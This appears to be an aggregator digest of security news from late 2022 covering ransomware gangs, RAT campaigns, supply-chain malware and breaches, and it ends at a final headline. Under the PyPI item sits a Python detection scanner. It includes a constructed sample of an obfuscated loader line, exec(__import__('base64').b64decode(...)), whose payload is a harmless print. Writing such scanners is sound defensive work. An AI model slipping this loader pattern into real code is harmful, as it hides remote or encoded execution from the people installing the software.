                Autosummary: "OPERA1ER often operates during weekends and public holidays," Group-IB said in a report shared with The Hacker News, adding the adversary's "entire arsenal is based on open-source programs and trojans, or free published RATs that can be found on the dark web." This includes off-the-shelf malware such as Nanocore, Netwire, Agent Tesla, Venom RAT, BitRAT, Metasploit, and Cobalt Strike Beacon, among others. "


                Experts link the Black Basta ransomware operation to FIN7 cybercrime gang

                exploits ransomware
                2022-11-03 https://securityaffairs.co/wordpress/138037/cyber-crime/black-basta-linked-fin7.html

                Sentinel Labs found evidence that links the Black Basta ransomware gang to the financially motivated hacking group FIN7. Security researchers at Sentinel Labs shared details about Black Basta‘s TTPs and assess it is highly likely the ransomware operation has ties with FIN7. The experts analyzed tools used by the ransomware gang in attacks, some of […]

                The post Experts link the Black Basta ransomware operation to FIN7 cybercrime gang appeared first on Security Affairs.

                "

                Autosummary: The report details Black Basta’s initial access activity, manual reconnaissance, lateral movements, privilege escalation techniques, and remote admin tools. "Furthermore, we assess it is likely that the developer(s) behind their tools to impair victim defenses is, or was, a developer for FIN7," concludes the report. "


                ALMA Observatory shuts down operations due to a cyberattack

                ciber
                2022-11-03 https://www.bleepingcomputer.com/news/security/alma-observatory-shuts-down-operations-due-to-a-cyberattack/
                The Atacama Large Millimeter Array (ALMA) Observatory in Chile has suspended all astronomical observation operations and taken its public website offline following a cyberattack on Saturday, October 29, 2022. [...] "

                Autosummary: The project cost $1.4 billion, making it the world’s most expensive ground telescope, and it was developed thanks to a multi-national effort involving the United States, Europe, Canada, Japan, South Korea, Taiwan, and Chile. "


                Verified users beware! Scammers are exploiting Twitter turmoil caused by Elon Musk’s takeover

                financial exploits industry
                2022-11-03 https://www.tripwire.com/state-of-security/verified-users-beware-scammers-are-exploiting-twitter-turmoil-caused-elon-musks
                The world's richest man's plans for the news junkie's favourite social network inevitably get a great deal of attention. Not everyone will be aware of the details of what Elon Musk might be planning for Twitter, but they will certainly be aware that it's a hot topic. And so if a Twitter user receives a message claiming to be about their verified account, they may very well believe it... and that makes them more susceptible to falling into a trap. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: The emails warn users that their "Verified" status - a coveted blue and white tick badge displayed alongside their name - will have to be paid for on a monthly basis, unless they can "fully verify [they are] famous or well-known. "


                The future starts now: 10 major challenges facing cybersecurity

                ciber
                2022-11-03 https://www.welivesecurity.com/2022/11/03/future-starts-10-major-challenges-facing-cybersecurity/

                To mark Antimalware Day, we’ve rounded up some of the most pressing issues for cybersecurity now and in the future

                The post The future starts now: 10 major challenges facing cybersecurity appeared first on WeLiveSecurity

                "

                Autosummary: Monitoring the dark web helps cyber-defenders prevent attacks, understand how fraudsters and cybercriminal groups think, what vulnerabilities are being traded, what malicious tools the bad actors use to access organizations’ systems or to defraud people, or what information about an organization is circulating in these underground markets. One variety of phishing that has seen explosive growth lately is so-called callback phishing, a tactic that combines traditional email-based phishing with voice-based phishing (aka vishing) and is used to gain access to organizations’ systems and deploy malware, such as ransomware, on their networks. To get an idea of the general interest in the world of cryptocurrencies, NFT, play-to-earn games and others, just take a look at platforms such as PhishTank and notice the number of new phishing sites that are spotted daily and are designed to steal people’s credentials for cryptocurrency wallets. "


                250+ U.S. news sites spotted spreading FakeUpdates malware in a supply-chain attack

                exploits
                2022-11-03 https://securityaffairs.co/wordpress/138052/cyber-crime/supply-chain-attack-fakeupdates.html

                Threat actors compromised a media company to deliver FakeUpdates malware through the websites of hundreds of newspapers in the US. Researchers at Proofpoint Threat Research observed threat actor TA569 intermittently injecting malicious code on a media company that serves many major news outlets. The media company provides video content and advertising […]

                The post 250+ U.S. news sites spotted spreading FakeUpdates malware in a supply-chain attack appeared first on Security Affairs.

                "

                Autosummary: Impacted media organizations serve Boston, New York, Chicago, Miami, Washington, DC, Cincinnati and Palm Beach, and include other national news outlets (Threat Insight, @threatinsight, November 2, 2022). Visitors to compromised websites were served malware payloads disguised as browser updates, with archive names such as Chromе.Uрdatе.zip, Chrome.Updater.zip, Firefoх.Uрdatе.zip, Operа.Updаte.zip and Oper.Updte.zip; several of these substitute Cyrillic letters for their Latin lookalikes. "


                RomCom RAT malware campaign impersonates KeePass, SolarWinds NPM, Veeam

                exploits
                2022-11-03 https://www.bleepingcomputer.com/news/security/romcom-rat-malware-campaign-impersonates-keepass-solarwinds-npm-veeam/
                The threat actor behind the RomCom RAT (remote access trojan) has refreshed its attack vector and is now abusing well-known software brands for distribution. [...] "

                Autosummary: The ZIP file contains several files, including "hlpr.dat", which is the RomCom RAT dropper, and "setup.exe", which launches the dropper. [Figure: fake KeePass website pushing RomCom RAT, via BlackBerry] "


                LockBit ransomware claims attack on Continental automotive giant

                exploits ransomware industry
                2022-11-03 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-claims-attack-on-continental-automotive-giant/
                The LockBit ransomware gang has claimed responsibility for a cyberattack against the German multinational automotive group Continental. [...] "

                Autosummary: [Figure: Continental entry on LockBit's data leak site, via BleepingComputer] Breached in an August cyberattack: Continental's VP of Communications & Marketing, Kathryn Blackwell, didn't confirm LockBit's claims and would not share any details regarding the attack when BleepingComputer reached out, but instead linked to a press release from August 24 regarding a cyberattack that led to a breach of Continental's systems. "


                OPERA1ER hackers steal over $11 million from banks and telcos

                financial
                2022-11-03 https://www.bleepingcomputer.com/news/security/opera1er-hackers-steal-over-11-million-from-banks-and-telcos/
                A threat group that researchers call OPERA1ER has stolen at least $11 million from banks and telecommunication service providers in Africa using off-the-shelf hacking tools. [...] "

                Autosummary: The emails have attachments that deliver the first-stage malware, among them Netwire, BitRAT, Venom RAT, AgentTesla, Remcos, Neutrino, and BlackNET. "


                Cybertech NYC 2022 to feature 70+ cybersecurity startups

                ciber
                2022-11-03 https://www.helpnetsecurity.com/2022/11/03/cybertech-nyc-2022-cybersecurity-startups/

                Cybertech NYC 2022 will host more than 70 cybersecurity startups at the Javits Center in New York City on November 15-16. The event will also feature global cyber leaders from Israel, France, Spain, Finland, the United Arab Emirates, and more. Oleh Derevianko, Chairman and CVO of Information System Security Partners in Ukraine, will offer his perspective on the cybersecurity angle of the war with Russia. Derevianko’s presentation is one of more than 20 sessions discussing various … More

                The post Cybertech NYC 2022 to feature 70+ cybersecurity startups appeared first on Help Net Security.

                "

                Autosummary: "


                Researchers Find Links b/w Black Basta Ransomware and FIN7 Hackers

                exploits ransomware
                2022-11-03 https://thehackernews.com/2022/11/researchers-find-links-bw-black-basta.html
                A new analysis of tools put to use by the Black Basta ransomware operation has identified ties between the threat actor and the FIN7 (aka Carbanak) group. This link "could suggest either that Black Basta and FIN7 maintain a special relationship or that one or more individuals belong to both groups," cybersecurity firm SentinelOne said in a technical write-up shared with The Hacker News. Black "

                Autosummary: Once Qakbot obtains a persistent foothold in the target environment, the Black Basta operator enters the scene to conduct reconnaissance by connecting to the victim through the backdoor, followed by exploiting known vulnerabilities (e.g., ZeroLogon, PrintNightmare, and NoPac) to escalate privileges. "


                LockBit ransomware gang claims the hack of Continental automotive group

                exploits ransomware industry
                2022-11-03 https://securityaffairs.co/wordpress/138062/cyber-crime/lockbit-gang-claims-continental-hack.html

                The LockBit ransomware group claims to have hacked the multinational automotive group Continental and threatens to leak stolen data. The LockBit ransomware gang announced that it had hacked the German multinational automotive parts manufacturer Continental. The group added the company's name to its Tor leak site and is threatening to publish the allegedly stolen data if the […]

                The post LockBit ransomware gang claims the hack of Continental automotive group appeared first on Security Affairs.

                "

                Autosummary: "


                32% of cybersecurity leaders considering quitting their jobs

                ciber
                2022-11-02 https://www.helpnetsecurity.com/2022/11/02/cisos-leaving-organization/

                32% of CISOs and IT security decision makers in the UK and US are considering leaving their current organization, according to research from BlackFog. Of those considering leaving their current role, a third would do so within the next six months. This research, which explored the frustrations and challenges faced by cybersecurity professionals, also highlights the impact that cyber incidents have on turnover and job security. It revealed that of those who had … More

                The post 32% of cybersecurity leaders considering quitting their jobs appeared first on Help Net Security.

                "

                Autosummary: The struggle to keep up with new cybersecurity approaches: Escalating cybersecurity threats are driving new innovations to help organizations improve their cybersecurity posture; however, findings show that 52% admitted they are struggling to keep up to date with new frameworks and models such as zero trust. "


                Meet fundamental cybersecurity needs before aiming for more

                ciber
                2022-11-02 https://www.helpnetsecurity.com/2022/11/02/hierarchy-of-cybersecurity-needs/

                In this interview for Help Net Security, Mike Lefebvre, Director of Cybersecurity at SEI, talks about the hierarchy of cybersecurity needs and what should be done to meet them properly. We have all heard about the hierarchy of human needs, but what about the hierarchy of cybersecurity needs? What does it consist of? A hierarchy of cybersecurity needs is inspired by a similar concept of the hierarchy of human needs, coined by the psychologist Abraham … More

                The post Meet fundamental cybersecurity needs before aiming for more appeared first on Help Net Security.

                "

                Autosummary: Examples of this include servers, endpoints, clouds, printers, applications, third-party vendors, IoT devices, identities and anything-as-a-service. Just as the hierarchy of human needs posits that we need to consistently have food, shelter, and water to achieve higher order actualization (e.g., belonging, religion, self-esteem), so too do we need to regularly meet foundational cyber needs. "


                130 Dropbox code repos plundered after successful phishing attack

                financial
                2022-11-02 https://www.helpnetsecurity.com/2022/11/02/dropbox-data-breach/

                Dropbox has suffered a data breach, but users needn’t worry because the attackers did not gain access to anyone’s Dropbox account, password, or payment information. Instead, they grabbed code from 130 of the company’s private repositories hosted on GitHub. What was compromised? The compromised repositories contain “copies of third-party libraries slightly modified for use by Dropbox, internal prototypes, and some tools and configuration files used by the security team” – but not code for Dropbox … More

                The post 130 Dropbox code repos plundered after successful phishing attack appeared first on Help Net Security.

                "

                Autosummary: The attackers also found API keys used by Dropbox developers, and a few thousand names and email addresses belonging to Dropbox employees, current and past customers, sales leads, and vendors. “Our security teams took immediate action to coordinate the rotation of all exposed developer credentials, and determine what customer data—if any—was accessed or stolen. "


                Forescout Continuum Timeline accelerates threat detection for cybersecurity teams

                ransomware ciber
                2022-11-02 https://www.helpnetsecurity.com/2022/11/02/forescout-continuum-timeline/

                Forescout Technologies has released its latest Continuum platform update which includes Forescout Continuum Timeline, a new cloud-native solution that provides long-term retention, search, and analytics of asset data. Timeline enables enterprises to meet compliance and audit requirements, better support incident investigations, and to identify risks and gaps to help prioritize preventative measures. Today, all organizations need an automated way of maintaining real-time asset intelligence for every connected device. Cybersecurity teams overwhelmed with rapid asset growth … More

                The post Forescout Continuum Timeline accelerates threat detection for cybersecurity teams appeared first on Help Net Security.

                "

                Autosummary: This Continuum platform update expands asset discovery, assessment, and management capabilities to reduce high manual labor costs, performance issues, challenges with keeping asset databases current, business disruptions, and the risk of security breaches due to asset intelligence gaps. "


                Dozens of PyPI packages caught dropping "W4SP" info-stealing malware

                exploits
                2022-11-02 https://www.bleepingcomputer.com/news/security/dozens-of-pypi-packages-caught-dropping-w4sp-info-stealing-malware/
                Researchers have discovered over two dozen Python packages on the PyPI registry that are pushing info-stealing malware. [...] "

                Autosummary: Software supply chain security firm Phylum revealed 29 packages in its report published yesterday: algorithmic, colorsama, colorwin, curlapi, cypress, duonet, faq, fatnoob, felpesviadinho, iao, incrivelsim, installpy, oiu, pydprotect, pyhints, pyptext, pyslyte, pystyle, pystyte, pyurllib, requests-httpx, shaasigma, strinfer, stringe, sutiltype, twyne, type-color, typestring, typesutil. Taking "typesutil" as an example, Phylum researchers explained how the threat actor injected malicious code via the "__import__" built-in into an "otherwise healthy codebase" borrowed from legitimate libraries, a theme we've repeatedly seen before. "
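                The pattern Phylum describes, one injected line that pulls in a module through the "__import__" built-in and executes decoded data inside an otherwise ordinary copied codebase, is exactly the shape a static pre-install check can catch, because the legitimate code around it has no reason to call exec() on the output of a decoder. The scanner below is an added example written for this page; it is not Phylum's tooling and the samples are constructed here, not W4SP code. It walks each file's AST, reports calls to "__import__", exec, eval and compile, reports exec/eval whose argument subtree contains a decode or decompress call, and flags long high-entropy string literals as a heuristic for embedded blobs. The benign sample stands in for the borrowed "healthy" code; the malicious sample is that same code with one injected line whose payload is a harmless print statement.

```python
import ast
import base64
import math
from collections import Counter

DYNAMIC_CALLS = {"__import__", "exec", "eval", "compile"}
DECODERS = {"b64decode", "b85decode", "a85decode", "decompress", "unhexlify"}


def _call_name(call):
    """Bare callee name: 'exec' for exec(...), 'b64decode' for base64.b64decode(...)."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def _entropy(s):
    """Shannon entropy in bits per character; base64 blobs sit well above English text."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def scan_source(src, filename="<module>"):
    """Return 'file:line: reason' findings for dynamic-import and exec-of-decoded-data patterns."""
    findings = []
    for node in ast.walk(ast.parse(src, filename)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in DYNAMIC_CALLS:
                findings.append(f"{filename}:{node.lineno}: call to {name}()")
            if name in {"exec", "eval"}:
                # exec/eval whose argument subtree decodes or decompresses something: the
                # injected-line shape, far rarer in honest library code than a bare exec().
                inner = (n for n in ast.walk(node) if isinstance(n, ast.Call) and n is not node)
                if any(_call_name(n) in DECODERS for n in inner):
                    findings.append(f"{filename}:{node.lineno}: {name}() over decoded data")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value
            if len(text) >= 40 and _entropy(text) > 4.5:
                findings.append(f"{filename}:{node.lineno}: high-entropy string literal "
                                f"({len(text)} chars)")
    return findings


def scan_package(files):
    """Scan {path: source} for a whole package; include setup.py, since install hooks run there."""
    return [f for path, src in sorted(files.items()) for f in scan_source(src, path)]


# Constructed samples. BENIGN_SRC stands in for the borrowed 'otherwise healthy' code;
# MALICIOUS_SRC is the same code plus one injected line. The payload is a harmless print.
BENIGN_SRC = '''
"""Utility helpers for the demo package, nothing dynamic."""
import json

def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

_PAYLOAD_B64 = base64.b64encode(b"print('constructed harmless payload, not a dropper')").decode()
MALICIOUS_SRC = BENIGN_SRC + f'''
_p = "{_PAYLOAD_B64}"
exec(__import__("base64").b64decode(_p))
'''

if __name__ == "__main__":
    for finding in scan_package({"pkg/__init__.py": MALICIOUS_SRC, "pkg/io.py": BENIGN_SRC}):
        print(finding)
```

                Running it prints the three findings on the injected line (the "__import__" call, the exec call, and exec over decoded data) and nothing for the benign file. The entropy rule is deliberately a weak signal on its own; the strong one is exec/eval fed by a decoder, which is why it is reported separately. Running this against a freshly downloaded sdist before pip installs it, with setup.py included, is the practical use.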


                Vodafone Italy discloses data breach after reseller hacked

                financial
                2022-11-02 https://www.bleepingcomputer.com/news/security/vodafone-italy-discloses-data-breach-after-reseller-hacked/
                Vodafone Italia is sending customers notices of a data breach, informing them that one of its commercial partners, FourB S.p.A., who operates as a reseller of the telco's services in the country, has fallen victim to a cyberattack. [...] "

                Autosummary: "


                Emotet botnet starts blasting malware again after 5 month break

                exploits
                2022-11-02 https://www.bleepingcomputer.com/news/security/emotet-botnet-starts-blasting-malware-again-after-5-month-break/
                The Emotet malware operation is again spamming malicious emails after almost a five-month "vacation" that saw little activity from the notorious cybercrime operation. [...] "

                Autosummary: In accordance with the requirements of your security policy, to display the contents of the document, you need to copy the file to the following folder and run it again: for Microsoft Office 2013 x32 and earlier - C:\Program Files\Microsoft Office (x86)\Templates for Microsoft Office 2013 x64 and earlier - C:\Program Files\Microsoft Office\Templates for Microsoft Office 2016 x32 and later - C:\Program Files (x86)\Microsoft Office\root\Templates for Microsoft Office 2016 x64 and later - C:\Program Files\Microsoft Office\root\Templates" While Windows will warn users that copying a file into the "Templates" folder requires "administrators" permissions, the fact that a user is attempting to copy the file indicates that there is a good chance they will also press the "Continue" button. "


                SandStrike, a previously undocumented Android malware targets a Persian-speaking religion minority

                exploits
                2022-11-02 https://securityaffairs.co/wordpress/137990/hacking/sandstrike-malware-cyberespionage.html

                Threat actors are using previously undocumented Android spyware, dubbed SandStrike, to spy on a Persian-speaking religious minority. In Q3 2022, Kaspersky researchers uncovered a previously undocumented Android spyware, dubbed SandStrike, employed in an espionage campaign targeting the Persian-speaking religious minority, Baháʼí. The threat actors were distributing a VPN app embedding a highly sophisticated spyware. The […]

                The post SandStrike, a previously undocumented Android malware targets a Persian-speaking religion minority appeared first on Security Affairs.

                "

                Autosummary: In Q3 2022, Kaspersky researchers uncovered a previously undocumented Android spyware, dubbed SandStrike, employed in an espionage campaign targeting the Persian-speaking religious minority, Baháʼí. "


                Hundreds of U.S. news sites push malware in supply-chain attack

                exploits
                2022-11-02 https://www.bleepingcomputer.com/news/security/hundreds-of-us-news-sites-push-malware-in-supply-chain-attack/
                The compromised infrastructure of an undisclosed media company is being used by threat actors to deploy the SocGholish JavaScript malware framework (also known as FakeUpdates) on the websites of hundreds of newspapers across the U.S. [...] "

                Autosummary: While the total number of impacted news organizations is currently unknown, Proofpoint says it knows of affected media organizations (including national news outlets) from New York, Boston, Chicago, Miami, Washington, D.C., and more. "


                Emotet botnet starts blasting malware again after 4 month break

                exploits
                2022-11-02 https://www.bleepingcomputer.com/news/security/emotet-botnet-starts-blasting-malware-again-after-4-month-break/
                The Emotet malware operation is again spamming malicious emails after almost a four-month "vacation" that saw little activity from the notorious cybercrime operation. [...] "

                Autosummary: In accordance with the requirements of your security policy, to display the contents of the document, you need to copy the file to the following folder and run it again: for Microsoft Office 2013 x32 and earlier - C:\Program Files\Microsoft Office (x86)\Templates for Microsoft Office 2013 x64 and earlier - C:\Program Files\Microsoft Office\Templates for Microsoft Office 2016 x32 and later - C:\Program Files (x86)\Microsoft Office\root\Templates for Microsoft Office 2016 x64 and later - C:\Program Files\Microsoft Office\root\Templates" While Windows will warn users that copying a file into the "Templates" folder requires "administrators" permissions, the fact that a user is attempting to copy the file indicates that there is a good chance they will also press the "Continue" button. "


                Socure and Carahsoft join forces to protect government agencies against identity fraud

                government
                2022-11-01 https://www.helpnetsecurity.com/2022/11/01/socure-carahsoft/

                Socure announced a new partnership with Carahsoft, providing Government agencies the opportunity to access Socure’s ID+ platform, an identity verification solution that goes beyond the industry standard to analyze every element of identity, maximize accuracy and inclusivity and protect against identity fraud. Carahsoft will serve as Socure’s Master Government Aggregator, making their leading platform available through Carahsoft’s reseller partners and NASA Solutions for Enterprise-Wide Procurement (SEWP) V, National Cooperative Purchasing Alliance (NCPA), and OMNIA Partners … More

                The post Socure and Carahsoft join forces to protect government agencies against identity fraud appeared first on Help Net Security.

                "

                Autosummary: "


                Synack’s API pentesting capability empowers users to verify exploitable API vulnerabilities

                exploits
                2022-11-01 https://www.helpnetsecurity.com/2022/11/01/synack-api-pentesting-capability/

                Synack launched an API pentesting capability powered by its global community of elite security researchers. Organizations can now rely on the Synack platform for continuous pentesting coverage across “headless” API endpoints that lack a user interface and are increasingly exposed to attackers. “Synack’s human-led, adversarial approach is ideal for testing APIs that form the backbone of society’s digital transformation,” said Synack CTO and co-founder Mark Kuhr, a former National Security Agency cybersecurity expert. “We are … More

                The post Synack’s API pentesting capability empowers users to verify exploitable API vulnerabilities appeared first on Help Net Security.

                "

                Autosummary: "


                Persistent and Google Cloud launch a solution to help organizations recover from cyberattacks

                ciber
                2022-11-01 https://www.helpnetsecurity.com/2022/11/01/persistent-intelligent-cyber-recovery/

                Persistent Systems launched a trailblazing solution that enables organizations to recover more quickly from cyber-attacks. Together with Google Cloud, the Persistent Intelligent Cyber Recovery (PiCR) solution provides a comprehensive and scalable cyber recovery approach, allowing organizations to reduce data loss and minimize the negative impact to brand reputation from prolonged downtime. Persistent Intelligent Cyber Recovery is now available on the Google Cloud Marketplace. Hackers are increasing the frequency and scale of ransomware attacks. They are … More

                The post Persistent and Google Cloud launch a solution to help organizations recover from cyberattacks appeared first on Help Net Security.

                "

                Autosummary: Reduction in data loss; decreased risk of recurrent attacks through the removal of malware; faster recovery from ransomware and zero-day attacks (from weeks/months to hours/days); potential cyber insurance cost reduction; scalable solution depending on enterprise size challenges. Nitha Puthran, Senior Vice President – Cloud, Infrastructure and Security, Persistent: “The digital environment today is constantly evolving and so are the risks associated with it. "


                Google ad for GIMP.org served info-stealing malware via lookalike site

                exploits
                2022-11-01 https://www.bleepingcomputer.com/news/security/google-ad-for-gimporg-served-info-stealing-malware-via-lookalike-site/
                Searching for "GIMP" on Google as recently as last week would show visitors an ad for "GIMP.org," the official website of the well-known graphics editor, GNU Image Manipulation Program. But clicking on it drove visitors to a lookalike phishing website that provided them with a 700 MB executable disguised as GIMP, which was malware. [...] "

                Autosummary: Redditor RawPacket surmised that this was the result of the threat actor creating a Google ad using the IDN homograph technique, which would make the Cyrillic "gіmp.org", which in reality is http://xn--gmp-jhd.org/, appear akin to the Latin "gimp.org." But, given the use of the phishing domains "gilimp.org" and "gimp.monster" in this campaign, the scenario seems unlikely. Google ads "display URL" vs. "landing URL": All of this has still left users puzzled as to why the Google ad showed "GIMP.org" as the destination domain in the first place, when the ad actually took users to the fake "gilimp.org" site. "


                Critical RCE Vulnerability Reported in ConnectWise Server Backup Solution

                exploits
                2022-11-01 https://thehackernews.com/2022/11/critical-rce-vulnerability-reported-in.html
                IT service management software platform ConnectWise has released software patches for a critical security vulnerability in Recover and R1Soft Server Backup Manager (SBM). The issue, characterized as a "neutralization of Special Elements in Output Used by a Downstream Component," could be abused to result in the execution of remote code or disclosure of sensitive information. ConnectWise's "

                Autosummary: "


                Ransomware activity and network access sales in Q3 2022

                exploits
                2022-11-01 https://securityaffairs.co/wordpress/137929/cyber-crime/ransomware-activity-q3-2022.html

                Ransomware activity report: Threat actors are selling access to hundreds of organizations, with a cumulative requested price of around $4M. Research published by threat intelligence firm KELA related to ransomware activity in Q3 reveals a stable activity in the sector of initial access sales, but experts observed a rise in the value of the offerings. […]

                The post Ransomware activity and network access sales in Q3 2022 appeared first on Security Affairs.

                "

                Autosummary: “However, excluding this one USD 3 million access, the difference wouldn’t be so serious.” Ransomware is a profitable business, and for this reason, new ransomware gangs are entering the cyber arena; in some cases the groups are composed of members of now-defunct prominent extortion groups. "


                Chinese Hackers Using New Stealthy Infection Chain to Deploy LODEINFO Malware

                exploits
                2022-11-01 https://thehackernews.com/2022/11/chinese-hackers-using-new-stealthy.html
                The Chinese state-sponsored threat actor known as Stone Panda has been observed employing a new stealthy infection chain in its attacks aimed at Japanese entities. Targets include media, diplomatic, governmental and public sector organizations and think-tanks in Japan, according to twin reports published by Kaspersky. Stone Panda, also called APT10, Bronze Riverside, Cicada, and Potassium, is a "

                Autosummary: "


                LockBit 3.0 gang claims to have stolen data from Thales

                ransomware
                2022-11-01 https://securityaffairs.co/wordpress/137955/cyber-crime/lockbit-3-0-thales.html

                The ransomware group LockBit 3.0 claimed to have stolen data from the French defence and technology group Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide. The Group invests in digital and deep tech innovations – big data, artificial intelligence, connectivity, cybersecurity and quantum – to build a future of trust, […]

                The post LockBit 3.0 gang claims to have stolen data from Thales appeared first on Security Affairs.

                "

                Autosummary: "


                Malware on the Google Play store leads to harmful phishing sites

                financial exploits
                2022-11-01 https://www.malwarebytes.com/blog/news/2022/11/malware-on-the-google-play-store-leads-to-harmful-phishing-sites

                Categories: Android

                Categories: News

                A family of malicious apps from the developer Mobile apps Group is on Google Play, infected with HiddenAds.

                (Read more...)

                The post Malware on the Google Play store leads to harmful phishing sites appeared first on Malwarebytes Labs.

                "

                Autosummary: Diving into the Text segment of the log, where the important data is stored, there are a couple of key datapoints: adDelay, chromeLink, and firstAdDelay. Many times, the activities, services, and receivers used by a particular malware are unique. However, at first glance at this malware it is hard to tell which activities, services, or receivers are running the malicious code. Additionally, after the first ad is displayed, it then has an adDelay of 7200000, or two hours. "


                Scams targeting cryptocurrency enthusiasts are getting more prevalent

                financial
                2022-10-31 https://www.helpnetsecurity.com/2022/10/31/scams-targeting-cryptocurrency-enthusiasts-video/

                Crypto giveaway scams have evolved into an illicit market segment with multiple services that aim to facilitate fraudulent operations. The growth of fake crypto giveaways can be explained by a significantly enhanced arsenal and availability of tools for crypto scammers, even with low technical skills. In this Help Net Security video, Tim Callan, Chief Compliance Officer at Sectigo, talks about the evolution of phishing scams and how cybercriminals are now innovating in order to access … More

                The post Scams targeting cryptocurrency enthusiasts are getting more prevalent appeared first on Help Net Security.

                "

                Autosummary: "


                Cyberattacks in healthcare sector more likely to carry financial consequences

                financial ciber
                2022-10-31 https://www.helpnetsecurity.com/2022/10/31/healthcare-sector-cyberattack/

                Netwrix announced additional findings for the healthcare sector from its global 2022 Cloud Security Report, revealing that 61% of respondents in the healthcare industry suffered a cyberattack on their cloud infrastructure within the last 12 months, compared to 53% for other verticals. Phishing was the most common type of attack reported. “The healthcare sector is a lucrative target for attackers because the chances of success are higher. The first two years of the pandemic exhausted … More

                The post Cyberattacks in healthcare sector more likely to carry financial consequences appeared first on Help Net Security.

                "

                Autosummary: "


                Samsung Galaxy Store Bug Could've Let Hackers Secretly Install Apps on Targeted Devices

                exploits
                2022-10-31 https://thehackernews.com/2022/10/samsung-galaxy-store-bug-couldve-let.html
                A now-patched security flaw has been disclosed in the Galaxy Store app for Samsung devices that could potentially trigger remote command execution on affected phones. The vulnerability, which affects Galaxy Store version 4.5.32.4, relates to a cross-site scripting (XSS) bug that occurs when handling certain deep links. An independent security researcher has been credited with reporting the issue "

                Autosummary: "


                GitHub Repojacking Bug Could've Allowed Attackers to Takeover Other Users' Repositories

                exploits
                2022-10-31 https://thehackernews.com/2022/10/github-repojacking-bug-couldve-allowed.html
                Cloud-based repository hosting service GitHub has addressed a high-severity security flaw that could have been exploited to create malicious repositories and mount supply chain attacks. The RepoJacking technique, disclosed by Checkmarx, entails a bypass of a protection mechanism called popular repository namespace retirement, which aims to prevent developers from pulling unsafe repositories with "

                Autosummary: "


                Hacking group abuses antivirus software to launch LODEINFO malware

                exploits
                2022-10-31 https://www.bleepingcomputer.com/news/security/hacking-group-abuses-antivirus-software-to-launch-lodeinfo-malware/
                The Chinese Cicada hacking group, tracked as APT10, was observed abusing security software to install a new version of the LODEINFO malware against Japanese organizations. [...] "

                Autosummary: The commands that remain in current versions are: Show embedded backdoor command list; Download a file from C2; Upload a file to C2; Inject the shellcode into memory; Kill a process using a process ID; Change directory; Send malware and system information; Take a screenshot; Encrypt files by a generated AES key; Execute a command using WMI; Config (incomplete implementation). "


                Unofficial Patch Released for New Actively Exploited Windows MotW Vulnerability

                exploits
                2022-10-31 https://thehackernews.com/2022/10/unofficial-patch-released-for-new.html
                An unofficial patch has been made available for an actively exploited security flaw in Microsoft Windows that makes it possible for files signed with malformed signatures to sneak past Mark-of-the-Web (MotW) protections. The fix, released by 0patch, arrives weeks after HP Wolf Security disclosed a Magniber ransomware campaign that targets users with fake security updates which employ a "

                Autosummary: "


                Wannacry, the hybrid malware that brought the world to its knees

                exploits
                2022-10-31 https://securityaffairs.co/wordpress/137894/cyber-crime/wannacry-hybrid-malware.html

                Reflecting on the Wannacry ransomware attack: what is the lesson learnt, and why are most organizations still ignoring it? In the early afternoon of Friday 12 May 2017, the media broke the news of a global computer security attack carried out through a malicious code capable of encrypting data residing in information systems and demanding […]

                The post Wannacry, the hybrid malware that brought the world to its knees appeared first on Security Affairs.

                "

                Autosummary: The ransomware, as reported in the Microsoft bulletin https://www.microsoft.com/en-us/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/, once transmitted by e-mail using phishing and social engineering methods or directly from the public network by exploiting a protocol flaw in the connected devices, proceeded to: encrypt computer data, using RSA public key asymmetric encryption techniques; multiply in the affected network, through an NSA code called EternalBlue, which exploited a vulnerability in the network file sharing protocol SMB (Server Message Block) used by Microsoft Windows systems. The infection chain: The infection chain was divided into four stages. The malware was installed through a dropper, a program executed by opening an attachment to a deceptive e-mail, probably a fake pdf or doc file, or executed directly from the Internet, without user interaction, using the exploit described in point 4. "


                Chegg sued by FTC after suffering four data breaches within 3 years

                financial
                2022-10-31 https://www.bleepingcomputer.com/news/security/chegg-sued-by-ftc-after-suffering-four-data-breaches-within-3-years/
                The U.S. Federal Trade Commission (FTC) has sued education technology company Chegg after it exposed the sensitive information of tens of millions of customers and employees in four data breaches suffered since 2017. [...] "

                Autosummary: Poor data security practices: The FTC complaint alleges that these four data breaches were the result of several poor data security practices, including Chegg's failure to implement basic security measures such as MFA support, the use of a single login for all compromised databases, and not monitoring for malicious activity. "


                Extortion fears after hacker stole patient files from Dutch mental health clinics

                industry
                2022-10-31 https://www.bitdefender.com/blog/hotforsecurity/extortion-fears-after-hacker-stole-patient-files-from-dutch-mental-health-clinics/
                Patients of Dutch mental health clinics are being warned that their personal records have fallen into the hands of hackers following a security breach at an online portal that "guaranteed" their privacy. Read more in my article on the Hot for Security blog. "

                Autosummary: "


                VMware warns of the public availability of CVE-2021-39144 exploit code

                exploits
                2022-10-31 https://securityaffairs.co/wordpress/137912/security/vmware-cve-2021-39144-exploit.html

                VMware warned of the availability of a public exploit for a recently addressed critical remote code execution flaw in NSX Data Center for vSphere (NSX-V). VMware warned of the existence of a public exploit targeting a recently addressed critical remote code execution (RCE) vulnerability, tracked as CVE-2021-39144 (CVSS score of 9.8), in NSX Data Center for […]

                The post VMware warns of the public availability of CVE-2021-39144 exploit code appeared first on Security Affairs.

                "

                Autosummary: "


                Actively exploited Windows Mark-of-the-Web zero-day received an unofficial patch

                exploits
                2022-10-31 https://securityaffairs.co/wordpress/137900/hacking/mark-of-the-web-bypass-0day.html

                An unofficial patch has been released for an actively exploited flaw in Microsoft Windows that allows bypassing Mark-of-the-Web (MotW) protections. 0patch released an unofficial patch to address an actively exploited security vulnerability in Microsoft Windows that could allow bypassing Mark-of-the-Web (MotW) protections by using files signed with malformed signatures. The issue affects all supported and multiple legacy […]

                The post Actively exploited Windows Mark-of-the-Web zero-day received an unofficial patch appeared first on Security Affairs.

                "

                Autosummary: "


                Raspberry Robin worm used as ransomware prelude

                exploits ransomware
